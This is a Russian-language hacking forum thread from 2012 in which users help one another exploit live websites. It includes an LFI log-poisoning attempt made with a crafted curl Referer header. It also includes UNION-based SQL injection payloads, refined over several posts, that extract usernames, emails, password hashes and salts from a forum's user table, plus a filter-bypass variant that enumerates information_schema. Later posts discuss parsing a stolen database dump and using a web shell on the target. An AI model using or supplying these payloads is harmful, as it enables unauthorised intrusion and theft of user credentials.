13.03.2012, 12:59
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 5
Провел на форуме:
168509
Репутация:
1
|
|
LFI
Камрады помогите советом.
Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом:
Код HTML:
curl http://www.domain.org/nopages1.php --referer "http://go"
В логе режет конструкцию
[PHP]
[COLOR="#000000"][COLOR="#007700"]
|
|
|
13.03.2012, 13:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Faaax, нужен запрос без плюсов, /**/ и остальных знаков, обойтись только скобками
|
|
|
|
13.03.2012, 13:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Faaax
тогда нужно сделать так
&messagegroupid[0]=3) UNION
(
SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )
)
FROM user WHERE userid=1
Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.
|
|
|
|
13.03.2012, 13:22
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
DronS,
ты забыл комментарий после запроса:
Сообщение от None
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
--+f
|
|
|
|
13.03.2012, 13:27
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Ну можно и комментарий)
|
|
|
|
13.03.2012, 14:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Есть дамп БД, необходимо некоторые данные привести в другой вид.
Первоначально:
Сообщение от None
`users` (`id`, `username`, `password`, `salt`, ....
Необходимо вырвать данные из определённых колонок, а именно: username: password: salt
Подскажите, чем лучше это сделать?
P.S. Вручную не предлагать. |
|
|
|
13.03.2012, 14:25
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
так тут у тебя ни одного пробела нету
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
|
|
|
|
13.03.2012, 14:36
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 10
Провел на форуме:
2205
Репутация:
0
|
|
Сообщение от Faaax
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
Все правильно он подсказал. Ты ответ БД читал до конца?)
Код:
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1);
2gl0w спасибо, запрос корректен теперь
2Ereee с коментарием тоже нормуль идет
|
|
|
|
13.03.2012, 16:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Faaax =\
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
так видно?
|
|
|
|
13.03.2012, 17:09
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
mix0x0,
у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
